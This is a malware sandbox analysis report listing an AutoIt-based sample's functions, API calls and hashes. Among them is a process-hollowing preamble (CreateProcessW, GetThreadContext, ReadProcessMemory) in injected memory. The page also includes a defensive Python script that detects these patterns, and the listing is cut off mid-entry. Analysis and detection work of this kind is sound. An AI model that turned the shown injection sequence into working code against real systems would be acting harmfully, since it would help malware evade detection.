                                          • API ID: CreateFileSleep
                                          • String ID: FOZSTXIVZM29AE6S90410LKP8Z7
                                          • API String ID: 2694422964-3290138862
                                          • Opcode ID: a8eb950437c68aad4324dc5159c9d6bfb119ebb360f1157b090abada7098a4c0
                                          • Instruction ID: 1f8cfcccf22217812561883848df9a0a4f10d5ccd2ad9b61a5d7f90f8ce82f0d
                                          • Opcode Fuzzy Hash: a8eb950437c68aad4324dc5159c9d6bfb119ebb360f1157b090abada7098a4c0
                                          • Instruction Fuzzy Hash: 4C618F30D14288DBEF11DBA4C954BEFBBB89F15304F004199E248BB2C1D7B91B49CBA6

                                          Control-flow Graph (rendered as an image on the original page; node list summarized here)
                                          • Blocks 90407c-90417d plus an out-of-line range 93d3c8-93d41e; exit block 90416f-904173
                                          • Subroutine calls: 907a16, 907bcc, 907b2e, 906fe3, 907cab, 922de0, 90454e, 922dbc, 905904, 908047
                                          • API calls: LoadStringW (93d3c8), Shell_NotifyIconW (in block 9040ed-90416a)
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0093D3D7
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • _memset.LIBCMT ref: 009040FC
                                          • _wcscpy.LIBCMT ref: 00904150
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00904160
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: b2bae31c1f16faa97cb3afb15bfbc27fb8b8ec3863fa7f92b4c2cf746c0bb251
                                          • Instruction ID: a2865cbdee40be8fc93cf5c46fe8200f6329106ea211e48eb45ca31bd951878f
                                          • Opcode Fuzzy Hash: b2bae31c1f16faa97cb3afb15bfbc27fb8b8ec3863fa7f92b4c2cf746c0bb251
                                          • Instruction Fuzzy Hash: 2331B27140C305AFD320EB60EC45FDB77ECAF94314F10491AF695921E1DB74A688CB92

                                          Control-flow Graph (rendered as an image on the original page; node list summarized here)
                                          • Blocks 90686a-9068d9 plus an out-of-line range 93e031-93e2b8
                                          • Subroutine calls: 904ddd, 96955b, 904e4a, 920db6, 9642f8, 906a8c, 922d55, 907480, 905db2, 9673e9, 9673d3, 90750f, 907616, 905d9b, 95f7a1, 920e2c, 9673bd, 90735d, 905e2a, 95f73d, 907de1, 905904, 906839, 95f65e, 96737f
                                          • No API calls appear directly in the graph; LoadLibraryExW and SetCurrentDirectoryW are reached through the subcalls listed under APIs below
                                          • Two loops: 93e227-93e237 back to 93e0fe, and 93e288-93e2b8 back to 93e273
                                          APIs
                                            • Part of subcall function 00904DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E0F
                                          • _free.LIBCMT ref: 0093E263
                                          • _free.LIBCMT ref: 0093E2AA
                                            • Part of subcall function 00906A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00906BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 9f951b50aed4ffbdbf6325d76127c8462744272e53f9694527125c064130519c
                                          • Instruction ID: 553d551a0ae33f4c3512a35d48687480e6085b4f3f4962c3c96eb89faebb063f
                                          • Opcode Fuzzy Hash: 9f951b50aed4ffbdbf6325d76127c8462744272e53f9694527125c064130519c
                                          • Instruction Fuzzy Hash: 96914A71904219AFCF04EFA4D891AEEB7B8FF48314F10442AE816AB2E1DB74A955CF50
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009035A1,SwapMouseButtons,00000004,?), ref: 009035D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009035A1,SwapMouseButtons,00000004,?,?,?,?,00902754), ref: 009035F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,009035A1,SwapMouseButtons,00000004,?,?,?,?,00902754), ref: 00903617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: d268454170f00d06eba184a004df81384789633b105ff62142a83b01ad10ab9d
                                          • Instruction ID: 590298238c6830107e7a116d5ccafbd076303d29ae9e81a4eca8332276c97f57
                                          • Opcode Fuzzy Hash: d268454170f00d06eba184a004df81384789633b105ff62142a83b01ad10ab9d
                                          • Instruction Fuzzy Hash: 33115771614208BFDB208F65DC81EAEBBBCEF05740F109869F805D7250E6729F40ABA0
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01271C8B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01271D21
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01271D43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                          • Instruction ID: 607905a3e28f9caee9a58e9bdf2875015993a9c14504da9e505ac2d8cd9386c3
                                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                          • Instruction Fuzzy Hash: B8621F30A24219DBEB24DFA4C851BDEB776EF58300F1091A9D20DEB390E7759E81CB59
                                          APIs
                                            • Part of subcall function 00904EE5: _fseek.LIBCMT ref: 00904EFD
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969824
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969837
                                          • _free.LIBCMT ref: 009696A2
                                          • _free.LIBCMT ref: 009696A9
                                          • _free.LIBCMT ref: 00969714
                                            • Part of subcall function 00922D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00929A24), ref: 00922D69
                                            • Part of subcall function 00922D55: GetLastError.KERNEL32(00000000,?,00929A24), ref: 00922D7B
                                          • _free.LIBCMT ref: 0096971C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction ID: b090c0bb9f11d14cac7fb93888c1629e1b01c524080cccce82a6aa62001714bf
                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction Fuzzy Hash: 195151B1D04259AFDF249F64DC81B9EBBB9EF88300F10449EF609A3281DB715A90CF58
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction ID: bbbee411303fd2932bf2f9dd3222bc82142546ae5596a15c73af1bd8d4ec31b5
                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction Fuzzy Hash: 9641D675B007669BDB18CF69F8809AE7BBDEF85360B24853DE829C7648D770DD408B40
                                          APIs
                                          • _memset.LIBCMT ref: 009044CF
                                            • Part of subcall function 0090407C: _memset.LIBCMT ref: 009040FC
                                            • Part of subcall function 0090407C: _wcscpy.LIBCMT ref: 00904150
                                            • Part of subcall function 0090407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00904160
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00904524
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00904533
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0093D4B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: c1c16dd60bd71e5b9a113a583d045a5b89cf2f0030b57943cb4506eb38f4b37a
                                          • Instruction ID: e8c046bcdab43c4f15535339078201c80098a5fe47de72abf54945b543bf0bb7
                                          • Opcode Fuzzy Hash: c1c16dd60bd71e5b9a113a583d045a5b89cf2f0030b57943cb4506eb38f4b37a
                                          • Instruction Fuzzy Hash: 1921F5B0909784AFF7328B249C69BE6BBECAF01308F04049DF79A962D1C3742984DB41
                                          APIs
                                          • _memset.LIBCMT ref: 0093EA39
                                          • GetOpenFileNameW.COMDLG32(?), ref: 0093EA83
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00920791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009207B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: 21136582bfee14b141bc812cbf6ec71a34a61099376ca413fbf7b95e42228875
                                          • Instruction ID: d73772a00eec8a0c5832a24ba5bbef081f3b6fb1821afbd34f468c871487a0f3
                                          • Opcode Fuzzy Hash: 21136582bfee14b141bc812cbf6ec71a34a61099376ca413fbf7b95e42228875
                                          • Instruction Fuzzy Hash: 6A21A171A142589FCB11DFD4D845BEEBBFCAF88710F004019E408AB281DBB45989CFA1
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 009698F8
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0096990F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: ddd121a0fad3ad071cf605fa7238d903b9828362ac92149e077a4cad7d750422
                                          • Instruction ID: 513839aef86d0b84a2ff660d474e567ed98424f9e697e2f38608d1a3c79dc464
                                          • Opcode Fuzzy Hash: ddd121a0fad3ad071cf605fa7238d903b9828362ac92149e077a4cad7d750422
                                          • Instruction Fuzzy Hash: 4ED05E7954430DABDB50DBA0DC0EFDA773CE708704F0002B1BA64D11A1EAB095989B91
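Two listings above are worth turning into a mechanical check rather than reading by eye: the function at ref 01271C8B (CreateProcessW, then Wow64GetThreadContext with ContextFlags 00010007, then a 4-byte ReadProcessMemory) in the unbacked 0x1270000 region, and the function at ref 0096990F that calls GetTempFileNameW with the "aut" prefix the AutoIt runtime uses for its temporary files. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" bullet lines in the format this report prints them, normalizes API names (Wow64/Nt/Zw prefixes, A/W suffixes), decodes the x86 ContextFlags value, and applies two rules written for this page. The sample dictionary is constructed from lines copied off this page; the rule names, the helper names and the dictionary keys are the example's own. Note the caveat built into the first rule: dwCreationFlags is shown as "?" in the CreateProcessW line, so CREATE_SUSPENDED cannot be confirmed from this page and the rule flags only the hollowing preamble, not a completed hollowing.

```python
"""Flag process-injection API patterns in Joe Sandbox "APIs" listings.

Added example, not part of the Joe Sandbox report or its tooling. It parses
the bullet lines as this report prints them and applies two rules written
for this page; rule names and the sample dictionary are constructed.
"""
import re

# Constructed sample input: API lines copied from three function listings in
# this report (refs 01271C8B, 0093D3D7 and 0096990F).
SAMPLE_LISTINGS = {
    "sub_1271c8b": """
• CreateProcessW.KERNELBASE(?,00000000), ref: 01271C8B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01271D21
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01271D43
""",
    "sub_90407c": """
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0093D3D7
  • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
• _memset.LIBCMT ref: 009040FC
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00904160
""",
    "sub_9698f8": """
• GetTempPathW.KERNEL32(00000104,?), ref: 009698F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0096990F
""",
}

# "<Api>.<Module>(<args>), ref: <addr>" with an optional subcall prefix;
# LIBCMT entries carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$",
    re.IGNORECASE)

# x86 CONTEXT bits from winnt.h: 0x00010000 is the CONTEXT_i386 marker and
# CONTEXT_FULL is CONTROL|INTEGER|SEGMENTS, i.e. 0x10007.
CONTEXT_I386 = 0x00010000
CONTEXT_FLAG_BITS = {0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS",
                     0x8: "FLOATING_POINT", 0x10: "DEBUG_REGISTERS",
                     0x20: "EXTENDED_REGISTERS"}

def normalize(api):
    """Fold Wow64/Nt/Zw prefixes and A/W suffixes so one rule matches all variants."""
    api = re.sub(r"^(Wow64|Nt|Zw)", "", api)
    return re.sub(r"(?<=[a-z])[AW]$", "", api)

def hexarg(arg):
    """Int value of a hex argument, or None for '?' and string arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def parse_listing(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "name": normalize(m["api"]), "module": m["mod"],
                      "args": args, "ref": int(m["ref"], 16),
                      "subcall": int(m["sub"], 16) if m["sub"] else None})
    return calls

def decode_context_flags(value):
    """Name the CONTEXT_* bits of an x86 ContextFlags dword; None if not x86."""
    if value & 0xFFFF0000 != CONTEXT_I386:
        return None
    names = [n for bit, n in CONTEXT_FLAG_BITS.items() if value & bit]
    if value & 0x7 == 0x7:           # CONTROL|INTEGER|SEGMENTS collapse to FULL
        names = ["FULL"] + names[3:]
    return "|".join("CONTEXT_" + n for n in names)

def rule_hollowing_preamble(calls):
    """CreateProcess + GetThreadContext + a cross-process memory/thread call.
    dwCreationFlags is '?' in the listing, so CREATE_SUSPENDED is not asserted."""
    names = {c["name"] for c in calls}
    return {"CreateProcess", "GetThreadContext"} <= names and bool(
        names & {"ReadProcessMemory", "WriteProcessMemory", "SetThreadContext",
                 "ResumeThread", "UnmapViewOfSection"})

def rule_autoit_tempfile(calls):
    """GetTempFileName called with the 'aut' prefix the AutoIt runtime uses."""
    return any(c["name"] == "GetTempFileName" and len(c["args"]) > 1
               and c["args"][1] == "aut" for c in calls)

RULES = [("hollowing_preamble", rule_hollowing_preamble),
         ("autoit_runtime_tempfile", rule_autoit_tempfile)]

def analyze(listing_text):
    """Return parsed calls, the rule names that fired and argument annotations."""
    calls = parse_listing(listing_text)
    hits = [name for name, rule in RULES if rule(calls)]
    notes = []
    for c in calls:
        if c["name"] == "GetThreadContext" and len(c["args"]) > 1:
            flags = hexarg(c["args"][1])
            if flags is not None:
                notes.append(f"{c['ref']:08X}: {c['api']} ContextFlags=0x{flags:X} "
                             f"({decode_context_flags(flags)})")
        if c["name"] == "ReadProcessMemory" and len(c["args"]) > 3 \
                and hexarg(c["args"][3]) == 4:
            notes.append(f"{c['ref']:08X}: ReadProcessMemory nSize=4, "
                         "a pointer-sized read from a 32-bit target")
    return {"calls": calls, "hits": hits, "notes": notes}

if __name__ == "__main__":
    for func, text in SAMPLE_LISTINGS.items():
        result = analyze(text)
        print(func, result["hits"], *result["notes"], sep="\n  ")
```

Run it as-is to see the 01271C8B listing flagged with ContextFlags decoded as CONTEXT_FULL and the 0096990F listing flagged as the AutoIt temp-file call, while the tray-icon function produces no hit. To use it on another report, paste that report's "APIs" bullets into the dictionary; the parser ignores the "Part of subcall function" prefix for matching but keeps the subcall address, so a rule can be tightened to direct calls only by checking `subcall is None`.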
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 753d6695bc1497d97b13a864913e59aeaa171e71c8cf4d7449d367cfc6564bdf
                                          • Instruction ID: b96ff6de2c897a190d2b5cf6b4f32d46eb960d0d76baa73b37ffdeb039c58ce2
                                          • Opcode Fuzzy Hash: 753d6695bc1497d97b13a864913e59aeaa171e71c8cf4d7449d367cfc6564bdf
                                          • Instruction Fuzzy Hash: 9AF106B16083019FCB14DF28C484A6ABBE5FF89314F54892EF8999B291D731E945CF82
                                          APIs
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00920193
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0092019B
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009201A6
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009201B1
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009201B9
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009201C1
                                            • Part of subcall function 009160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0090F930), ref: 00916154
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0090F9CD
                                          • OleInitialize.OLE32(00000000), ref: 0090FA4A
                                          • CloseHandle.KERNEL32(00000000), ref: 009445C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID:
                                          • API String ID: 1986988660-0
                                          • Opcode ID: e6723950a59408f43fa6d8010196095588e6ca99b937a545e6bed43b617c0213
                                          • Instruction ID: 7ebd4b6ad2a4bdfd094065b6ec2f54eb80224935c36bf4c288030564e1947a1d
                                          • Opcode Fuzzy Hash: e6723950a59408f43fa6d8010196095588e6ca99b937a545e6bed43b617c0213
                                          • Instruction Fuzzy Hash: F481BFB0D29B80CFC398DF29A850E197BE5FB98346792812AE019C73B1E77064C5EF11
                                          APIs
                                          • _memset.LIBCMT ref: 00904370
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00904415
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00904432
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 74e093b634a696a18279f4fc7de19fc50a82bd420a3a513ee5d81ca158b8e7a7
                                          • Instruction ID: 67c2d2fd19ad38c70d6b90962a46644dc9e741ee691830747b163124fe0a3595
                                          • Opcode Fuzzy Hash: 74e093b634a696a18279f4fc7de19fc50a82bd420a3a513ee5d81ca158b8e7a7
                                          • Instruction Fuzzy Hash: 313193B19087018FD720DF34D884A9BBBF8FB58308F00092EF69A82291D771B984CB52
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092A16B: __NMSG_WRITE.LIBCMT ref: 0092A192
                                            • Part of subcall function 0092A16B: __NMSG_WRITE.LIBCMT ref: 0092A19C
                                          • __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092A1C8: GetModuleFileNameW.KERNEL32(00000000,009C33BA,00000104,?,00000001,00000000), ref: 0092A25A
                                            • Part of subcall function 0092A1C8: ___crtMessageBoxW.LIBCMT ref: 0092A308
                                            • Part of subcall function 0092309F: ___crtCorExitProcess.LIBCMT ref: 009230A5
                                            • Part of subcall function 0092309F: ExitProcess.KERNEL32 ref: 009230AE
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 48134cd2b7ab51286b05b16c5bb8ab74bfefeb3ef81272bdff35fe460b47040e
                                          • Instruction ID: b735d81852579d7ad32aa9d6cb9a43b50212cc53e58fc2e80d8211b150b8e9e9
